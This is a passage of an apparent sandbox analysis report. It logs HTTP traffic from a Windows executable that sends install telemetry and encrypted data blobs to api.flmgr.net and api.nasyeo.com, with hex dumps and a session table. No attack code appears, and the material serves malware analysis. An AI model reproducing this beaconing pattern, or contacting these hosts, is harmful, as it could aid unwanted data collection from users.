                                                                                      Data Ascii: uCGCj2HEWmqOwzDZJj4uPloszVoSZatGBEIQ2fyz/AFPNxgspiXp03LzFz3zWn7BQ+f2FS3ApZvHfSJBwHcPKt5BBrrUaqzX7u2xolOBbWcwNQ89UrN1GtOWTPUpZigqOoXkhImoTKXCvqkcBdHcMSyngoIg8s/18rON8+HlZr17NpIH17/+XHfezAxzqee9MyyLbdwKgA02aI5XFDkhmaVPfyW+dKpq/c6C7XjdinNRWkMn991VkzKB6nToU1E+WdxYD4nyaFlHhb1bsP0M/C4rLpcz5C9NvTC747SH45lVithyvtSUQ9PnOdGomsk7TqTE5SX8wgtZYaSu3+HtMxR7QSwqgTwXDz0RVTF1ZCe33Pz/isce90sk80+MBo9sb0TnoGpNKyTwwOWhQJos0aEerHJ7daKjof/DN1Y+ZJ8AEfpGWIfUoFRgsu89LluyC7vc9YSff2T3k7ndrfbms3bM2yfKJkml6Dj68xLQHP8HOYXSMAUwXU48uWKT1dLym+PHaM3TGtvOEG5TmFcWV4BKnqoirxjKBNFxrrieCBLS+sMZTcaYooel2GuiX6aYkzTgAecsksbZ4O6F5gpIBgo7XtGG3/VITT0lB3NKr5l9A1cMkOqt+FpohMNqLGoehEIqYHkzG7ct6b15t1cF8k6iK/z0IdptOZuO3IfVoSV6sIPABEIkXk9J1cvfh3EtivRMZqDJSC
                                                                                      Aug 4, 2023 18:48:15.574883938 CEST103INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:48:05 GMT
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      Content-Length: 800
                                                                                      Connection: keep-alive
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                                                      Access-Control-Allow-Headers: DNT,web-token,app-token,Authorization,Accept,Origin,Keep-Alive,User-Agent,X-Mx-ReqToken,X-Data-Type,X-Auth-Token,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Range
                                                                                      Data Raw: 75 43 47 43 6a 32 48 45 57 6d 71 4f 77 7a 44 5a 4a 6a 34 75 50 6c 6f 73 7a 56 6f 53 5a 61 74 47 42 45 49 51 32 66 79 7a 2f 41 46 50 4e 78 67 73 70 69 58 70 30 33 4c 7a 46 7a 33 7a 57 6e 37 42 51 2b 66 32 46 53 33 41 70 5a 76 48 66 53 4a 42 77 48 63 50 4b 74 35 42 42 72 72 55 61 71 7a 58 37 75 32 78 6f 6c 4f 42 62 57 63 77 4e 51 38 39 55 72 4e 31 47 74 4f 57 54 50 55 70 5a 69 67 71 4f 6f 58 6b 68 49 6d 6f 54 4b 58 43 76 71 6b 63 42 64 48 63 4d 53 79 6e 67 6f 49 67 38 73 2f 31 38 72 4f 4e 38 2b 48 6c 5a 72 31 37 4e 70 49 48 31 37 2f 2b 58 48 66 65 7a 41 78 7a 71 65 65 39 4d 79 79 4c 62 64 77 4b 67 41 30 32 61 49 35 58 46 44 6b 68 6d 61 56 50 66 79 57 2b 64 4b 70 71 2f 63 36 43 37 58 6a 64 69 6e 4e 52 57 6b 4d 6e 39 39 31 56 6b 7a 4b 42 36 6e 54 6f 55 31 45 2b 57 64 78 59 44 34 6e 79 61 46 6c 48 68 62 31 62 73 50 30 4d 2f 43 34 72 4c 70 63 7a 35 43 39 4e 76 54 43 37 34 37 53 48 34 35 6c 56 69 74 68 79 76 74 53 55 51 39 50 6e 4f 64 47 6f 6d 73 6b 37 54 71 54 45 35 53 58 38 77 67 74 5a 59 61 53 75 33 2b 48 74 4d 78 52 37 51 53 77 71 67 54 77 58 44 7a 30 52 56 54 46 31 5a 43 65 33 33 50 7a 2f 69 73 63 65 39 30 73 6b 38 30 2b 4d 42 6f 39 73 62 30 54 6e 6f 47 70 4e 4b 79 54 77 77 4f 57 68 51 4a 6f 73 30 61 45 65 72 48 4a 37 64 61 4b 6a 6f 66 2f 44 4e 31 59 2b 5a 4a 38 41 45 66 70 47 57 49 66 55 6f 46 52 67 73 75 38 39 4c 6c 75 79 43 37 76 63 39 59 53 66 66 32 54 33 6b 37 6e 64 72 66 62 6d 73 33 62 4d 32 79 66 4b 4a 6b 6d 6c 36 44 6a 36 38 78 4c 51 48 50 38 48 4f 59 58 53 4d 41 55 77 58 55 34 38 75 57 4b 54 31 64 4c 79 6d 2b 50 48 61 4d 33 54 47 74 76 4f 45 47 35 54 6d 46 63 57 56 34 42 4b 6e 71 6f 69 72 78 6a 4b 42 4e 46 78 72 72 69 65 43 42 4c 53 2b 73 4d 5a 54 63 61 59 6f 6f 65 6c 32 47 75 69 58 36 61 59 6b 7a 54 67 41 65 63 73 6b 73 62 5a 34 4f 36 46 35 67 70 49 42 67 6f 37 58 74 47 47 33 2f 56 49 54 54 30 6c 42 33 4e 4b 72 35 6c 39 41 31 63 4d 6b 4f 71 74 2b 46 70 6f 68 4d 4e 71 4c 47 6f 65 68 45 49 71 59 48 6b 7a 47 37 63 74 36 62 31 35 74 31 63 46 38 6b 36 69 4b 2f 7a 30 49 64 70 74 4f 5a 75 4f 33 49 66 56 6f 53 56 36 73 49 50 41 42 45 49 6b 58 6b 39 4a 31 63 76 66 68 33 45 74 69 76 52 4d 5a 71 44 4a 53 43
                                                                                      Data Ascii: uCGCj2HEWmqOwzDZJj4uPloszVoSZatGBEIQ2fyz/AFPNxgspiXp03LzFz3zWn7BQ+f2FS3ApZvHfSJBwHcPKt5BBrrUaqzX7u2xolOBbWcwNQ89UrN1GtOWTPUpZigqOoXkhImoTKXCvqkcBdHcMSyngoIg8s/18rON8+HlZr17NpIH17/+XHfezAxzqee9MyyLbdwKgA02aI5XFDkhmaVPfyW+dKpq/c6C7XjdinNRWkMn991VkzKB6nToU1E+WdxYD4nyaFlHhb1bsP0M/C4rLpcz5C9NvTC747SH45lVithyvtSUQ9PnOdGomsk7TqTE5SX8wgtZYaSu3+HtMxR7QSwqgTwXDz0RVTF1ZCe33Pz/isce90sk80+MBo9sb0TnoGpNKyTwwOWhQJos0aEerHJ7daKjof/DN1Y+ZJ8AEfpGWIfUoFRgsu89LluyC7vc9YSff2T3k7ndrfbms3bM2yfKJkml6Dj68xLQHP8HOYXSMAUwXU48uWKT1dLym+PHaM3TGtvOEG5TmFcWV4BKnqoirxjKBNFxrrieCBLS+sMZTcaYooel2GuiX6aYkzTgAecsksbZ4O6F5gpIBgo7XtGG3/VITT0lB3NKr5l9A1cMkOqt+FpohMNqLGoehEIqYHkzG7ct6b15t1cF8k6iK/z0IdptOZuO3IfVoSV6sIPABEIkXk9J1cvfh3EtivRMZqDJSC
                                                                                      Aug 4, 2023 18:48:25.814891100 CEST126INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:48:05 GMT
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      Content-Length: 800
                                                                                      Connection: keep-alive
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                                                      Access-Control-Allow-Headers: DNT,web-token,app-token,Authorization,Accept,Origin,Keep-Alive,User-Agent,X-Mx-ReqToken,X-Data-Type,X-Auth-Token,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Range
                                                                                      Data Raw: 75 43 47 43 6a 32 48 45 57 6d 71 4f 77 7a 44 5a 4a 6a 34 75 50 6c 6f 73 7a 56 6f 53 5a 61 74 47 42 45 49 51 32 66 79 7a 2f 41 46 50 4e 78 67 73 70 69 58 70 30 33 4c 7a 46 7a 33 7a 57 6e 37 42 51 2b 66 32 46 53 33 41 70 5a 76 48 66 53 4a 42 77 48 63 50 4b 74 35 42 42 72 72 55 61 71 7a 58 37 75 32 78 6f 6c 4f 42 62 57 63 77 4e 51 38 39 55 72 4e 31 47 74 4f 57 54 50 55 70 5a 69 67 71 4f 6f 58 6b 68 49 6d 6f 54 4b 58 43 76 71 6b 63 42 64 48 63 4d 53 79 6e 67 6f 49 67 38 73 2f 31 38 72 4f 4e 38 2b 48 6c 5a 72 31 37 4e 70 49 48 31 37 2f 2b 58 48 66 65 7a 41 78 7a 71 65 65 39 4d 79 79 4c 62 64 77 4b 67 41 30 32 61 49 35 58 46 44 6b 68 6d 61 56 50 66 79 57 2b 64 4b 70 71 2f 63 36 43 37 58 6a 64 69 6e 4e 52 57 6b 4d 6e 39 39 31 56 6b 7a 4b 42 36 6e 54 6f 55 31 45 2b 57 64 78 59 44 34 6e 79 61 46 6c 48 68 62 31 62 73 50 30 4d 2f 43 34 72 4c 70 63 7a 35 43 39 4e 76 54 43 37 34 37 53 48 34 35 6c 56 69 74 68 79 76 74 53 55 51 39 50 6e 4f 64 47 6f 6d 73 6b 37 54 71 54 45 35 53 58 38 77 67 74 5a 59 61 53 75 33 2b 48 74 4d 78 52 37 51 53 77 71 67 54 77 58 44 7a 30 52 56 54 46 31 5a 43 65 33 33 50 7a 2f 69 73 63 65 39 30 73 6b 38 30 2b 4d 42 6f 39 73 62 30 54 6e 6f 47 70 4e 4b 79 54 77 77 4f 57 68 51 4a 6f 73 30 61 45 65 72 48 4a 37 64 61 4b 6a 6f 66 2f 44 4e 31 59 2b 5a 4a 38 41 45 66 70 47 57 49 66 55 6f 46 52 67 73 75 38 39 4c 6c 75 79 43 37 76 63 39 59 53 66 66 32 54 33 6b 37 6e 64 72 66 62 6d 73 33 62 4d 32 79 66 4b 4a 6b 6d 6c 36 44 6a 36 38 78 4c 51 48 50 38 48 4f 59 58 53 4d 41 55 77 58 55 34 38 75 57 4b 54 31 64 4c 79 6d 2b 50 48 61 4d 33 54 47 74 76 4f 45 47 35 54 6d 46 63 57 56 34 42 4b 6e 71 6f 69 72 78 6a 4b 42 4e 46 78 72 72 69 65 43 42 4c 53 2b 73 4d 5a 54 63 61 59 6f 6f 65 6c 32 47 75 69 58 36 61 59 6b 7a 54 67 41 65 63 73 6b 73 62 5a 34 4f 36 46 35 67 70 49 42 67 6f 37 58 74 47 47 33 2f 56 49 54 54 30 6c 42 33 4e 4b 72 35 6c 39 41 31 63 4d 6b 4f 71 74 2b 46 70 6f 68 4d 4e 71 4c 47 6f 65 68 45 49 71 59 48 6b 7a 47 37 63 74 36 62 31 35 74 31 63 46 38 6b 36 69 4b 2f 7a 30 49 64 70 74 4f 5a 75 4f 33 49 66 56 6f 53 56 36 73 49 50 41 42 45 49 6b 58 6b 39 4a 31 63 76 66 68 33 45 74 69 76 52 4d 5a 71 44 4a 53 43
                                                                                      Data Ascii: uCGCj2HEWmqOwzDZJj4uPloszVoSZatGBEIQ2fyz/AFPNxgspiXp03LzFz3zWn7BQ+f2FS3ApZvHfSJBwHcPKt5BBrrUaqzX7u2xolOBbWcwNQ89UrN1GtOWTPUpZigqOoXkhImoTKXCvqkcBdHcMSyngoIg8s/18rON8+HlZr17NpIH17/+XHfezAxzqee9MyyLbdwKgA02aI5XFDkhmaVPfyW+dKpq/c6C7XjdinNRWkMn991VkzKB6nToU1E+WdxYD4nyaFlHhb1bsP0M/C4rLpcz5C9NvTC747SH45lVithyvtSUQ9PnOdGomsk7TqTE5SX8wgtZYaSu3+HtMxR7QSwqgTwXDz0RVTF1ZCe33Pz/isce90sk80+MBo9sb0TnoGpNKyTwwOWhQJos0aEerHJ7daKjof/DN1Y+ZJ8AEfpGWIfUoFRgsu89LluyC7vc9YSff2T3k7ndrfbms3bM2yfKJkml6Dj68xLQHP8HOYXSMAUwXU48uWKT1dLym+PHaM3TGtvOEG5TmFcWV4BKnqoirxjKBNFxrrieCBLS+sMZTcaYooel2GuiX6aYkzTgAecsksbZ4O6F5gpIBgo7XtGG3/VITT0lB3NKr5l9A1cMkOqt+FpohMNqLGoehEIqYHkzG7ct6b15t1cF8k6iK/z0IdptOZuO3IfVoSV6sIPABEIkXk9J1cvfh3EtivRMZqDJSC
                                                                                      Aug 4, 2023 18:48:33.529658079 CEST151OUTGET /log/client/install?Action=open&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&IsUpdgade=0&OldVer= HTTP/1.1
                                                                                      Cache-Control: no-store
                                                                                      Connection: Keep-Alive
                                                                                      Expires: 0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
                                                                                      Host: api.flmgr.net
                                                                                      Aug 4, 2023 18:48:33.874684095 CEST152INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:48:33 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 2
                                                                                      Connection: keep-alive
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                                                      Access-Control-Allow-Headers: DNT,web-token,app-token,Authorization,Accept,Origin,Keep-Alive,User-Agent,X-Mx-ReqToken,X-Data-Type,X-Auth-Token,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Range
                                                                                      Data Raw: 7b 7d
                                                                                      Data Ascii: {}
                                                                                      Aug 4, 2023 18:48:40.541735888 CEST3174OUTGET /log/client/site_soft?Action=down_suc&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&Checks=1&Err=0 HTTP/1.1
                                                                                      Cache-Control: no-store
                                                                                      Connection: Keep-Alive
                                                                                      Expires: 0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
                                                                                      Host: api.flmgr.net
                                                                                      Aug 4, 2023 18:48:40.887562037 CEST3174INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:48:40 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 2
                                                                                      Connection: keep-alive
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                                                      Access-Control-Allow-Headers: DNT,web-token,app-token,Authorization,Accept,Origin,Keep-Alive,User-Agent,X-Mx-ReqToken,X-Data-Type,X-Auth-Token,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Range
                                                                                      Data Raw: 7b 7d
                                                                                      Data Ascii: {}
                                                                                      Aug 4, 2023 18:49:00.411643028 CEST3464OUTPOST /v1/client/exts HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Proxy-Connection: Keep-Alive
                                                                                      Pragma: no-cache
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: text/plain, application/xhtml+xml
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
                                                                                      Content-Length: 216
                                                                                      Host: api.flmgr.net
                                                                                      Aug 4, 2023 18:49:00.411695957 CEST3464OUTData Raw: 75 41 6e 68 77 79 36 56 62 45 79 4a 77 6e 53 58 4a 69 38 32 4d 68 59 63 32 56 39 4b 4c 4f 51 54 53 68 52 68 6a 4c 6a 30 74 30 6c 50 55 6c 70 34 70 69 37 37 30 6d 54 74 42 30 75 36 44 41 47 76 51 66 33 30 41 31 71 66 34 71 2b 4d 4d 58 30 76 67 33
                                                                                      Data Ascii: uAnhwy6VbEyJwnSXJi82MhYc2V9KLOQTShRhjLj0t0lPUlp4pi770mTtB0u6DAGvQf30A1qf4q+MMX0vg39ZGYtSFr7CMujS+/P111iQKSMXbU5xFLxiTsTYDIEmNndUWcyw35q1W+SX8OwcDt3dPTer9dlMv7OWuvbMz6a9Leh7Oopum/6oERGSoUsj3LTxdGvVbbJR1mxvPcMMFAl+og==
                                                                                      Aug 4, 2023 18:49:01.531650066 CEST3465OUTData Raw: 75 41 6e 68 77 79 36 56 62 45 79 4a 77 6e 53 58 4a 69 38 32 4d 68 59 63 32 56 39 4b 4c 4f 51 54 53 68 52 68 6a 4c 6a 30 74 30 6c 50 55 6c 70 34 70 69 37 37 30 6d 54 74 42 30 75 36 44 41 47 76 51 66 33 30 41 31 71 66 34 71 2b 4d 4d 58 30 76 67 33
                                                                                      Data Ascii: uAnhwy6VbEyJwnSXJi82MhYc2V9KLOQTShRhjLj0t0lPUlp4pi770mTtB0u6DAGvQf30A1qf4q+MMX0vg39ZGYtSFr7CMujS+/P111iQKSMXbU5xFLxiTsTYDIEmNndUWcyw35q1W+SX8OwcDt3dPTer9dlMv7OWuvbMz6a9Leh7Oopum/6oERGSoUsj3LTxdGvVbbJR1mxvPcMMFAl+og==
                                                                                      Aug 4, 2023 18:49:01.879214048 CEST3466INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:49:01 GMT
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                                                      Access-Control-Allow-Headers: DNT,web-token,app-token,Authorization,Accept,Origin,Keep-Alive,User-Agent,X-Mx-ReqToken,X-Data-Type,X-Auth-Token,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Range
                                                                                      Data Raw: 63 66 38 0d 0a 75 43 47 69 6a 47 72 53 48 52 4c 49 6e 53 4c 50 4a 6d 74 74 5a 68 6c 4c 6a 32 67 64 42 50 63 42 53 41 77 51 30 76 79 73 2f 45 6b 49 41 51 4e 36 76 6a 32 4b 6a 6a 7a 2f 58 42 61 72 59 55 50 41 51 54 6c 73 6f 65 68 48 48 6a 67 53 6e 71 4b 46 50 2f 2f 76 31 6c 6d 76 2b 44 70 38 38 57 74 66 66 79 51 63 56 4e 56 50 6b 76 58 6e 38 35 33 49 38 65 59 78 54 68 63 61 30 6c 62 38 6d 33 6c 79 57 34 6a 2f 69 71 4c 79 45 2b 54 66 76 72 68 4f 54 4d 6e 43 50 48 44 6d 36 5a 34 50 38 4e 4c 58 2f 62 50 41 37 37 4f 73 4a 2b 67 33 4e 4e 4d 67 6c 72 76 36 54 6a 54 57 37 68 78 76 35 37 4c 2b 5a 69 48 77 59 63 4a 46 70 57 42 73 50 63 4d 50 42 6a 4d 79 68 75 49 62 4f 45 6e 7a 49 4a 78 36 35 73 71 43 37 51 48 4f 33 43 63 48 4b 42 31 71 35 39 31 56 33 6e 4c 77 35 6e 54 38 43 55 6b 77 53 6f 6b 45 58 76 75 73 4a 56 70 59 6b 76 41 62 78 2b 73 50 71 6a 59 6c 5a 49 63 6f 34 47 31 41 76 6d 57 6f 2b 2f 6d 4d 72 64 67 51 6e 4a 6c 6f 74 6f 4b 58 46 73 6a 39 41 4a 4c 6a 79 74 51 79 55 4f 4f 47 73 33 50 34 78 52 34 58 62 36 72 70 2b 4b 75 75 5a 69 64 74 52 58 31 70 7a 54 67 50 45 6d 56 59 45 32 73 6a 4d 6a 53 35 30 71 62 48 6a 4e 35 46 6c 67 59 34 2b 68 37 62 42 70 4e 73 4f 77 72 48 76 79 6b 59 52 44 50 34 31 73 54 72 44 64 59 6d 31 71 73 65 75 6e 49 36 4b 2f 36 74 75 66 47 53 63 67 59 77 66 35 46 41 55 61 4a 49 52 5a 57 41 2f 51 63 68 6f 66 41 7a 62 78 37 71 47 4b 48 4e 71 63 58 64 4b 33 66 73 6b 2f 47 50 76 62 79 76 38 6d 33 58 78 6d 69 44 4e 52 76 76 75 53 6a 69 38 30 36 64 43 2b 39 41 64 73 7a 57 4b 52 73 74 54 55 41 6b 2f 79 50 52 7a 39 7a 38 79 66 66 57 61 59 36 47 54 4d 4c 4d 41 54 46 54 6a 6c 64 58 42 64 38 46 32 4f 4e 7a 74 42 7a 45 56 74 39 70 2f 50 6e 64 53 52 4b 56 73 64 67 57 54 63 62 2f 72 4a 62 36 69 44 54 77 54 61 32 59 36 45 62 66 54 4b 78 68 33 34 79 65 35 72 6a 4c 74 46 73 55 52 68 55 75 53 73 75 4d 31 50 56 4c 57 54 56 67 57 58 39 55 71 35 38 7a 43 51 64 54 31 36 53 69 36 31 68 36 32 70 73 6a 50 48 35 4d 67 6c 46 38 50 47 46 77 57 36 4d 32 75 75 73 71 39 68 49 59 36 31 6d 32 59 72 2f 71 4d 73 6b 33 50 70 33 55 6c 64 6d 49 39 47 52 6b 36 64 65 48 47 68 4a 6d 41 78 73 56 31 49 71 66 30 6e
                                                                                      Data Ascii: cf8uCGijGrSHRLInSLPJmttZhlLj2gdBPcBSAwQ0vys/EkIAQN6vj2Kjjz/XBarYUPAQTlsoehHHjgSnqKFP//v1lmv+Dp88WtffyQcVNVPkvXn853I8eYxThca0lb8m3lyW4j/iqLyE+TfvrhOTMnCPHDm6Z4P8NLX/bPA77OsJ+g3NNMglrv6TjTW7hxv57L+ZiHwYcJFpWBsPcMPBjMyhuIbOEnzIJx65sqC7QHO3CcHKB1q591V3nLw5nT8CUkwSokEXvusJVpYkvAbx+sPqjYlZIco4G1AvmWo+/mMrdgQnJlotoKXFsj9AJLjytQyUOOGs3P4xR4Xb6rp+KuuZidtRX1pzTgPEmVYE2sjMjS50qbHjN5FlgY4+h7bBpNsOwrHvykYRDP41sTrDdYm1qseunI6K/6tufGScgYwf5FAUaJIRZWA/QchofAzbx7qGKHNqcXdK3fsk/GPvbyv8m3XxmiDNRvvuSji806dC+9AdszWKRstTUAk/yPRz9z8yffWaY6GTMLMATFTjldXBd8F2ONztBzEVt9p/PndSRKVsdgWTcb/rJb6iDTwTa2Y6EbfTKxh34ye5rjLtFsURhUuSsuM1PVLWTVgWX9Uq58zCQdT16Si61h62psjPH5MglF8PGFwW6M2uusq9hIY61m2Yr/qMsk3Pp3UldmI9GRk6deHGhJmAxsV1Iqf0n
                                                                                      Aug 4, 2023 18:49:01.879241943 CEST3468INData Raw: 30 79 6d 71 67 59 4c 37 76 43 56 69 37 59 62 66 72 47 36 39 50 4f 69 6d 33 70 43 78 67 42 45 46 32 64 67 6c 42 69 35 61 58 2f 47 48 48 77 50 76 46 71 72 35 6b 30 62 64 34 50 6f 6c 30 7a 72 79 76 6d 4b 64 49 51 55 55 72 4a 4d 38 64 4a 54 72 6f 79
                                                                                      Data Ascii: 0ymqgYL7vCVi7YbfrG69POim3pCxgBEF2dglBi5aX/GHHwPvFqr5k0bd4Pol0zryvmKdIQUUrJM8dJTroyED+mHMAaGVJGDY5YMR4gsA5G3ALQMvc6qOJtKc3Y3ZSIm6MVT9Ka7uWxyVSh71LLOXkRnAcQ8Yh0+Jq4/SIlwuSvhSfowahAFT33BMwXA8FDV+wTpJNG8dUMJCd2HnBO789EYed661EVu1ZxYI+sv12k0KExfx2Y0
                                                                                      Aug 4, 2023 18:49:01.879266977 CEST3469INData Raw: 64 5a 4e 62 62 74 4f 44 4e 46 66 4a 2f 61 62 56 70 4d 4a 49 42 6f 58 4b 66 78 4b 63 6c 77 31 39 77 79 32 4d 37 63 43 78 33 70 51 6a 74 35 72 64 64 77 32 6e 57 68 38 61 6d 5a 6c 6c 4d 64 56 6b 37 77 70 52 64 58 68 58 77 43 48 2f 44 4d 48 36 6c 4b
                                                                                      Data Ascii: dZNbbtODNFfJ/abVpMJIBoXKfxKclw19wy2M7cCx3pQjt5rddw2nWh8amZllMdVk7wpRdXhXwCH/DMH6lKLCT9Qe3af9xdt7AIrlof4sdvREaD7IHJbkG3a5EQxiURy/Pr78glIK+eq9gISOk7z3Be5q44l83mMar9kvIQMetRxFBegD7e8Bi5Uu9ysuhlpPFKXCB0YMWGP7pJMrJQRZ0SFDq8bUHqxvyUVA0yR7Ti9PbGZXPRQ
                                                                                      Aug 4, 2023 18:49:01.879283905 CEST3469INData Raw: 45 75 33 4f 2f 68 37 53 6b 6a 6d 78 4d 34 47 49 4f 74 31 54 39 41 49 41 53 62 7a 72 70 66 71 55 34 4f 7a 79 4a 4a 76 6a 37 72 6b 6b 63 3d 0d 0a
                                                                                      Data Ascii: Eu3O/h7SkjmxM4GIOt1T9AIASbzrpfqU4OzyJJvj7rkkc=
                                                                                      Aug 4, 2023 18:49:02.742685080 CEST3471INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      13192.168.2.34970660.205.148.17880C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Aug 4, 2023 18:48:15.575823069 CEST104OUTPOST /api/info HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Proxy-Connection: Keep-Alive
                                                                                      Pragma: no-cache
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: text/plain, application/xhtml+xml
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
                                                                                      Content-Length: 216
                                                                                      Host: api.nasyeo.com
                                                                                      Aug 4, 2023 18:48:15.575886965 CEST104OUTData Raw: 75 41 6e 68 77 79 36 56 62 45 79 4a 77 6e 53 58 4a 69 38 32 4d 68 59 63 32 56 39 4b 4c 4f 51 54 53 68 52 68 6a 4c 6a 30 74 30 6c 50 55 6c 70 34 70 69 37 37 30 6d 54 74 42 30 75 36 44 41 47 76 51 66 33 30 41 31 71 66 34 71 2b 4d 4d 58 30 76 67 33
                                                                                      Data Ascii: uAnhwy6VbEyJwnSXJi82MhYc2V9KLOQTShRhjLj0t0lPUlp4pi770mTtB0u6DAGvQf30A1qf4q+MMX0vg39ZGYtSFr7CMujS+/P111iQKSMXbU5xFLxiTsTYDIEmNndUWcyw35q1W+SX8OwcDt3dPTer9dlMv7OWuvbMz6a9Leh7Oopum/6oERGSoUsj3LTxdGvVbbJR1mxvPcMMFAl+og==
                                                                                      Aug 4, 2023 18:48:16.692846060 CEST105OUTData Raw: 75 41 6e 68 77 79 36 56 62 45 79 4a 77 6e 53 58 4a 69 38 32 4d 68 59 63 32 56 39 4b 4c 4f 51 54 53 68 52 68 6a 4c 6a 30 74 30 6c 50 55 6c 70 34 70 69 37 37 30 6d 54 74 42 30 75 36 44 41 47 76 51 66 33 30 41 31 71 66 34 71 2b 4d 4d 58 30 76 67 33
                                                                                      Data Ascii: uAnhwy6VbEyJwnSXJi82MhYc2V9KLOQTShRhjLj0t0lPUlp4pi770mTtB0u6DAGvQf30A1qf4q+MMX0vg39ZGYtSFr7CMujS+/P111iQKSMXbU5xFLxiTsTYDIEmNndUWcyw35q1W+SX8OwcDt3dPTer9dlMv7OWuvbMz6a9Leh7Oopum/6oERGSoUsj3LTxdGvVbbJR1mxvPcMMFAl+og==
                                                                                      Aug 4, 2023 18:48:17.811963081 CEST105OUTData Raw: 75 41 6e 68 77 79 36 56 62 45 79 4a 77 6e 53 58 4a 69 38 32 4d 68 59 63 32 56 39 4b 4c 4f 51 54 53 68 52 68 6a 4c 6a 30 74 30 6c 50 55 6c 70 34 70 69 37 37 30 6d 54 74 42 30 75 36 44 41 47 76 51 66 33 30 41 31 71 66 34 71 2b 4d 4d 58 30 76 67 33
                                                                                      Data Ascii: uAnhwy6VbEyJwnSXJi82MhYc2V9KLOQTShRhjLj0t0lPUlp4pi770mTtB0u6DAGvQf30A1qf4q+MMX0vg39ZGYtSFr7CMujS+/P111iQKSMXbU5xFLxiTsTYDIEmNndUWcyw35q1W+SX8OwcDt3dPTer9dlMv7OWuvbMz6a9Leh7Oopum/6oERGSoUsj3LTxdGvVbbJR1mxvPcMMFAl+og==
                                                                                      Aug 4, 2023 18:48:18.170212984 CEST106INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:48:18 GMT
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      Content-Length: 528
                                                                                      Connection: keep-alive
